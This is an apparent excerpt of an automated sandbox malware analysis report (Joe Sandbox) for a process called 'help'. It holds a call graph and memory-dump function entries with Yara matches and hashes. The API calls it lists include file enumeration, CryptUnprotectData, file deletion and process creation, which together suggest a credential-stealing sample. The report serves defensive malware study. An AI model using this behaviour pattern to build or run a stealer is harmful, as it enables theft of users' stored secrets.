calls 84563->84565 84564 2f4aa40 10 API calls 84564->84565 84565->84563 84565->84564 84567 2f40a11 84565->84567 84589 2f3ff40 84565->84589 84568 2f3e320 10 API calls 84567->84568 84570 2f40a69 84567->84570 84600 2f402a0 84567->84600 84568->84567 84571 2f4e310 2 API calls 84570->84571 84572 2f40a70 84571->84572 84572->84292 84574 2f404f6 84573->84574 84575 2f40501 84573->84575 84576 2f4e3f0 2 API calls 84574->84576 84577 2f3e740 3 API calls 84575->84577 84576->84575 84587 2f40510 84577->84587 84578 2f40517 84578->84294 84579 2f3e2e0 2 API calls 84579->84587 84580 2f407d0 84581 2f407e9 84580->84581 84582 2f4e310 2 API calls 84580->84582 84581->84294 84582->84581 84583 2f3e320 10 API calls 84583->84587 84584 2f4aa40 10 API calls 84584->84587 84585 2f3ff40 12 API calls 84585->84587 84586 2f3af20 LdrLoadDll 84586->84587 84587->84578 84587->84579 84587->84580 84587->84583 84587->84584 84587->84585 84587->84586 84588 2f402a0 10 API calls 84587->84588 84588->84587 84590 2f3ff66 84589->84590 84591 2f46f30 10 API calls 84590->84591 84592 2f3ffc2 84591->84592 84593 2f431f0 10 API calls 84592->84593 84594 2f3ffcd 84593->84594 84596 2f40150 84594->84596 84598 2f3ffeb 84594->84598 84595 2f40135 84595->84565 84596->84595 84597 2f3fe10 12 API calls 84596->84597 84597->84596 84598->84595 84606 2f3fe10 84598->84606 84601 2f402c6 84600->84601 84602 2f46f30 10 API calls 84601->84602 84603 2f40337 84602->84603 84604 2f431f0 10 API calls 84603->84604 84605 2f40342 84604->84605 84605->84567 84607 2f3fe26 84606->84607 84610 2f43660 84607->84610 84609 2f3ff2e 84609->84598 84612 2f4369d 84610->84612 84611 2f4374d 84611->84609 84612->84611 84613 2f44640 12 API calls 84612->84613 84614 2f436f0 84612->84614 84613->84614 84615 2f43729 84614->84615 84616 2f4e310 LdrLoadDll RtlFreeHeap 84614->84616 84615->84609 84616->84615 84618 2f40f45 84617->84618 84619 2f47340 LdrLoadDll 84618->84619 84620 2f40f90 84619->84620 84621 2f412fc 84620->84621 84622 2f46f30 10 API calls 84620->84622 84621->84083 84623 2f40fac 84622->84623 84623->84621 84668 2f4cae0 84623->84668 84625 2f40fe2 84626 2f412e4 84625->84626 84628 2f4f500 3 API calls 84625->84628 84627 2f4e310 2 API calls 84626->84627 84627->84621 84629 2f41001 84628->84629 84629->84626 84630 2f41104 84629->84630 84631 2f4c300 2 API calls 84629->84631 84671 2f3bfb0 LdrLoadDll LdrInitializeThunk 84630->84671 84632 2f41085 84631->84632 84632->84630 84638 2f4108d 84632->84638 84634 2f4112f 84634->84626 84639 2f41164 84634->84639 84642 2f3bea0 2 API calls 84634->84642 84635 2f410ea 84636 2f4e310 2 API calls 84635->84636 84640 2f410fa 84636->84640 84637 2f410b9 84643 2f4c890 2 API calls 84637->84643 84638->84621 84638->84635 84638->84637 84641 2f3bea0 2 API calls 84638->84641 84672 2f3bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84639->84672 84640->84083 84641->84637 84642->84639 84645 2f410c9 84643->84645 84649 2f4b6e0 2 API calls 84645->84649 84646 2f41186 84647 2f41194 84646->84647 84648 2f412c3 84646->84648 84673 2f4c900 LdrLoadDll 84647->84673 84651 2f4e310 2 API calls 84648->84651 84649->84635 84652 2f412da 84651->84652 84652->84083 84653 2f411b3 84654 2f3dec0 3 API calls 84653->84654 84655 2f41218 84654->84655 84655->84626 84656 2f41223 84655->84656 84657 2f4e310 2 API calls 84656->84657 84658 2f41247 84657->84658 84674 2f4c460 LdrLoadDll 84658->84674 84660 2f4125b 84661 2f4c410 2 API calls 84660->84661 84662 2f41282 84661->84662 84663 2f41289 84662->84663 84675 2f4c460 LdrLoadDll 84662->84675 84663->84083 84665 2f412ab 84676 2f4c220 LdrLoadDll 84665->84676 84667 2f412b9 84667->84083 84669 2f4d3d0 LdrLoadDll 84668->84669 84670 2f4caff CreateProcessInternalW 84669->84670 84670->84625 84671->84634 84672->84646 84673->84653 84674->84660 84675->84665 84676->84667 84677->84094 84678->84092 84679->84085
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F42D4F
                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02F42D8E
                                                                                                                                                                            • FindClose.KERNELBASE(?), ref: 02F42D99
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                                                            • Opcode ID: d10bf51bb892601e2bd434e116e25794247cd466396b2d26ee92433fea3f2757
                                                                                                                                                                            • Instruction ID: e299ce11eafc81b29879438ae6d8e3363c25c2db0caa0fa9093f9710bbc61d60
                                                                                                                                                                            • Opcode Fuzzy Hash: d10bf51bb892601e2bd434e116e25794247cd466396b2d26ee92433fea3f2757
                                                                                                                                                                            • Instruction Fuzzy Hash: A9317871900308BBDB21DF65CC85FEF7B7DAF44745F144599BA4AA7180DBB0AA848BA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,02F43B22), ref: 02F446D0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 834300711-3916222277
                                                                                                                                                                            • Opcode ID: bddbab0ce1a3bc017cac492c3917048b1620c57e71186e3a480e7adb822d177d
                                                                                                                                                                            • Instruction ID: 2073eefe71a5bf177e5066d040f8c1ed8b78115ad053ad5ebee56dc5fb110586
                                                                                                                                                                            • Opcode Fuzzy Hash: bddbab0ce1a3bc017cac492c3917048b1620c57e71186e3a480e7adb822d177d
                                                                                                                                                                            • Instruction Fuzzy Hash: 16514472D00159AFDB11DFA8DC80BEEBBB9BF59344F04056AE709B7240E7706A448FA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,02F4709C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02F4709C,00000000,00000005,00000060,00000000,00000000), ref: 02F4C7AD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: fa55cba62b4dcf6efcde1521d539d09b86c621ef1dae617e37294dda7bcb8b72
                                                                                                                                                                            • Instruction ID: 659ccf6f4597a7539d70a86a11547acc257fc05d38e355b54597e4e26bb3e3f8
                                                                                                                                                                            • Opcode Fuzzy Hash: fa55cba62b4dcf6efcde1521d539d09b86c621ef1dae617e37294dda7bcb8b72
                                                                                                                                                                            • Instruction Fuzzy Hash: F701B2B6214108AFDB08DF98DC84EEB37A9AF8C754F118248BA0DE7240D630EC11CBA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,02F4709C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02F4709C,00000000,00000005,00000060,00000000,00000000), ref: 02F4C7AD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                                                                                                            • Instruction ID: 3c17e514de56152a815306493b8de1306050416d3d650ec106991536a88a0be5
                                                                                                                                                                            • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF0C4B2200208AFCB08CF88DC84EEB37EDAF8C754F018208BA0D97240C630F811CBA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 2340568224-3887548279
                                                                                                                                                                            • Opcode ID: bf3fb65256cb05358dd9878f227424f1ce821631920a3038e76a4465e90cda2d
                                                                                                                                                                            • Instruction ID: fcc2497b4a463e86095a7e3ca9a2655c9f0d9bd2b32363d72cfd93d8da20f7cc
                                                                                                                                                                            • Opcode Fuzzy Hash: bf3fb65256cb05358dd9878f227424f1ce821631920a3038e76a4465e90cda2d
                                                                                                                                                                            • Instruction Fuzzy Hash: 04A1A3B2D00209ABDB15DFA4CC41EEEBBB9AF44384F108559F609A7240EB74A744CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtReadFile.NTDLL(02F47260,02F42534,FFFFFFFF,02F46D4A,00000206,?,02F47260,00000206,02F46D4A,FFFFFFFF,02F42534,02F47260,00000206,00000000), ref: 02F4C855
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                                                                                                            • Instruction ID: ffeeee6f90f4d49653186caab10fb93aaf9411f5a131332198bc3695bf1ac76b
                                                                                                                                                                            • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                                                                                                            • Instruction Fuzzy Hash: 50F0B7B2200108AFCB14DF89DC84EEB77ADEF8C754F118248BE0D97241D670E811CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F32D11,00002000,00003000,00000004), ref: 02F4C979
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                                            • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                                                                                                            • Instruction ID: 50dc3e8b4062c795e565cdacce89e36c4e9c9e0bf4d9dc8e75c7f2b276ac2b6c
                                                                                                                                                                            • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                                                                                                            • Instruction Fuzzy Hash: 09F015B2200208ABCB18DF89DC80EAB77ADAF88754F018108BE0997241CA70F810CBB4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtDeleteFile.NTDLL(02F47062,00000206,?,02F47062,00000005,00000018,?,?,00000000,00000206,?), ref: 02F4C885
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                            • Opcode ID: 5d92fb98b5fd5c800c8cb3da522eb7fa3a84337e3ae126e0c9905766bdc5b286
                                                                                                                                                                            • Instruction ID: b7e85109466c5ae1c8645e9eece7b907b37393a1b7c203f94706edd8e6504052
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d92fb98b5fd5c800c8cb3da522eb7fa3a84337e3ae126e0c9905766bdc5b286
                                                                                                                                                                            • Instruction Fuzzy Hash: A0E08632200114ABC710DB94EC45EE77B68EF44750F114559F90E9B641C570D6058BE0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(02F4723E,00000206,?,02F4723E,00000005,FFFFFFFF), ref: 02F4C8B5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                            • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                                                                                                            • Instruction ID: 20d97d7fa15c485c862b445cd1b1e0b2785a54c409641d8a734782bf1c748fa5
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                                                                                                            • Instruction Fuzzy Hash: 2FD012712002146BD614EBA8DC49E977B5DDF44650F014155BA0D5B241C570F5008AE0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtDeleteFile.NTDLL(02F47062,00000206,?,02F47062,00000005,00000018,?,?,00000000,00000206,?), ref: 02F4C885
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                            • Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                                                                                                                                                            • Instruction ID: 1b180440f78ae521df2671694f9ef83d2087b25407f4de2a6b66273777ced670
                                                                                                                                                                            • Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                                                                                                                                                            • Instruction Fuzzy Hash: 5BD01772200218ABD710EB98DC89EA77BACEF48B60F114455BA0D5B241CAB0FA008BE0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 5de9e9fb7ff3106f680e3f37f632000c41c7e276fbb50dac3e86bab642af7107
                                                                                                                                                                            • Instruction ID: b470db25948de1e01b55ba792c81b3f597a6ec460a34dc1743a9c0ccb8f5f894
                                                                                                                                                                            • Opcode Fuzzy Hash: 5de9e9fb7ff3106f680e3f37f632000c41c7e276fbb50dac3e86bab642af7107
                                                                                                                                                                            • Instruction Fuzzy Hash: A590023161920802E900A15D4614706105587D2201F61C89AA0518568DC7A5895175B2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 9bb73f05327ddcc28109a380cddae280f0aa058442c663a2e51e725f98ce4b82
                                                                                                                                                                            • Instruction ID: 4f45c6021bee669c65a2a8f59307a1dd82e37884216bb77c04f04f25a1f1a5ac
                                                                                                                                                                            • Opcode Fuzzy Hash: 9bb73f05327ddcc28109a380cddae280f0aa058442c663a2e51e725f98ce4b82
                                                                                                                                                                            • Instruction Fuzzy Hash: 4390023121518C02E910A15D850474A005587D2301F55C89AA4518658DC7A588917131
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: d6406f67b30388162d83a2bc7a46a61c981a5105778f2d48013350490b9bf3db
                                                                                                                                                                            • Instruction ID: 4469d319d47f917a4791511edbf3bde1ee83eb5e5904326c18bec7cd1cac2890
                                                                                                                                                                            • Opcode Fuzzy Hash: d6406f67b30388162d83a2bc7a46a61c981a5105778f2d48013350490b9bf3db
                                                                                                                                                                            • Instruction Fuzzy Hash: 1390023121510C42E900A15D4504B46005587E2301F51C49FA0218654DC725C8517531
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 0a05c7f23cd00b93e61a49d41135a7ba776822203ef52310edd9c5ae619a66a4
                                                                                                                                                                            • Instruction ID: c0f64d0e4d8f6774eee244c1ae3cb73db9c60ef4a496f25de2cc9a22468b3789
                                                                                                                                                                            • Opcode Fuzzy Hash: 0a05c7f23cd00b93e61a49d41135a7ba776822203ef52310edd9c5ae619a66a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 3690023121510802E900A59D5508646005587E2301F51D49AA5118555EC77588917131
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: bae87d355c557c287b0bb6a4d4cc0305bfa04f01aaa9ab010d0de1da5553ba56
                                                                                                                                                                            • Instruction ID: 9e5d4307f7f5c64d78aef0e9da89300e91b113425df687b9cc2b14e55b789d66
                                                                                                                                                                            • Opcode Fuzzy Hash: bae87d355c557c287b0bb6a4d4cc0305bfa04f01aaa9ab010d0de1da5553ba56
                                                                                                                                                                            • Instruction Fuzzy Hash: EA90023121510C02E980B15D450464A005587D3301F91C49EA0119654DCB258A5977B1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: cd66cb4a94f41c8467f28dc741ef684b8529b2af40726812f10ad5ece114091c
                                                                                                                                                                            • Instruction ID: 478791fe02e0fe19e3df504c72486df0e37f025c0b93c76b3a60904ad5cfcc0e
                                                                                                                                                                            • Opcode Fuzzy Hash: cd66cb4a94f41c8467f28dc741ef684b8529b2af40726812f10ad5ece114091c
                                                                                                                                                                            • Instruction Fuzzy Hash: D690023121914C42E940B15D4504A46006587D2305F51C49AA0158694DD7358D55B671
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: dcfb6050b6f1d4a274623d2c6cdaa2bb6547d79e36692934b939c17fa75fc195
                                                                                                                                                                            • Instruction ID: 9473feb9df54cfab1e5830e9b7e9c1c31b8733d1bee4e257cca1bc28f99034f7
                                                                                                                                                                            • Opcode Fuzzy Hash: dcfb6050b6f1d4a274623d2c6cdaa2bb6547d79e36692934b939c17fa75fc195
                                                                                                                                                                            • Instruction Fuzzy Hash: 06900261216104035905B15D4514616405A87E2201B51C4AAE1108590DC63588917135
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 970216616643e905a2eb867fe2d2adbb08b3b0dcde75ffc40df2f7a315bb1ccc
                                                                                                                                                                            • Instruction ID: 22bbdd89ba79823a5267e33a796a516f65e5fa68aa69abb4bb555bddb8670d97
                                                                                                                                                                            • Opcode Fuzzy Hash: 970216616643e905a2eb867fe2d2adbb08b3b0dcde75ffc40df2f7a315bb1ccc
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D90023161910C02E950B15D4514746005587D2301F51C49AA0118654DC7658A5576B1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e3fa543a416152ec4fed0884f8a5b6c8176f6473b6a4bbe50de5d3608ca8db46
                                                                                                                                                                            • Instruction ID: d3c15349b3f53d65a17df5d0bf1c0e14439fbfc5bc7fe584d0150e132d5b1ab0
                                                                                                                                                                            • Opcode Fuzzy Hash: e3fa543a416152ec4fed0884f8a5b6c8176f6473b6a4bbe50de5d3608ca8db46
                                                                                                                                                                            • Instruction Fuzzy Hash: 12900225235104021945E55D070450B049597D7351391C49EF150A590CC73188656331
